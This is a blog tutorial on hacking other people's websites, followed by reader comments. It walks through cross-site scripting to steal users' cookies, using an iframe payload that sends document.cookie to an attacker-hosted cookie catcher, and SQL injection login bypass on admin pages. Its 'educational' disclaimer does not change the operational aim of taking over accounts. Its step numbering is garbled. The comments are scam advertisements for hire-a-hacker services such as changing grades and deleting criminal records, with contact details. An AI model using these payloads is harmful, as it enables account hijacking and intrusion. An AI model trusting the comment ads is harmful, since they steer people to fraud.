Ever wanted to know how to hack a website? While it is not possible to hack every site, you may be able to hack a vulnerable one, such as a message board. This Blog will show you how to hack a site using cross site scripting as well as injection attacks. It will also give you tips on how to set yourself up for success.
Note: This Supporting Zone is strictly for educational purposes, either to help people begin to learnwhite hat hacking or to see how hackers work in order to protect their own sites better.
- 1Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is secure then this will not work. window.alert(“test”) window.alert(“test”)window.alert(“test”)
- 2Go to create a post. You will need to type some special code into the “post” which will capture the data of all who click on it.
- You’ll want to test to see if the system filters out code. Post
<script>window.alert(“test”)</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.
- You’ll want to test to see if the system filters out code. Post
- 3Create and upload your cookie catcher. The goal of this attack is to capture a user’s cookies, which allows you access to their account for websites with vulnerable logins. You’ll need a cookie catcher, which will capture your target’s cookies and reroute them. Upload the catcher to a website you have access to and that supports php. An example cookie catcher code can be found in the sample section.
- 4Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
- An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
- An example code would look like
- 5Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
- 2Executing Injection Attacks
- 1Find a vulnerable site. You will need to find a site that is vulnerable, due to an easily accessible admin login. Try searching Google for admin login.asp.
- 2Login as an admin. Type admin as the username and use one of a number of different strings as the password. These can be any one of a number of different strings but a common example is 1’or’1’='1 or 2'='2.
- 3Be patient. This is probably going to require a little trial and error.
- 4Access the website. Eventually, you should be able to find a string that allows you admin access to a website, assuming the website is vulnerable to attack.
3Setting Up for Success- 1Learn a programming language or two. If you want to really learn how to hack websites, you’ll need to understand how computers and other technologies work. Learn to use programming languages like Python or SQL, so that you can gain better control of computers and identify vulnerabilities in systems.
- 2Have basic HTML literacy. You will also need to have a really good understanding of html and javascript if you want to hack websites in particular. This can take time to learn but there are lots of free ways to learn on the internet, so you will certainly have the opportunity if you want to take it.
- 3Consult with whitehats. Whitehats are hackers who use their powers for good, exposing security vulnerabilities and making the internet a better place for everyone. If you’re wanting to learn to hack and use your powers for good or if you want to help protect your own website, you might want to contact some current whitehats for advice.
- 5
Keep up to date. Because the list of possible hacks is ever-changing, you’ll need to be sure you keep up to date. Just because you’re protected from a certain type of hack now doesn’t mean you’ll be safe in the future!.
ReplyDeleteIf you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest
Email: cybergoldenhacker at gmail dot com
To be honest, there are real hackers out there who can take down bad records legally, I am a living witness. For years I had some bad records which prevented me from getting any reasonable jobs or even loans. Someone added me to a solutions group where I met this pro hacker ALBERT VADIM. He cleared all my bad records, I got a great job and afterwards he helped fix my credit reports and got me up to 7 credit score. Yes, it sounded unreal to me at first but in the end it was completely worth it. IF YOU NEED HELP, CONTACT ALBERT ON EMAIL: Vadimwebhack@gmail,com WhatsApp +17025301177 OR kIK: Arturquickhack
ReplyDelete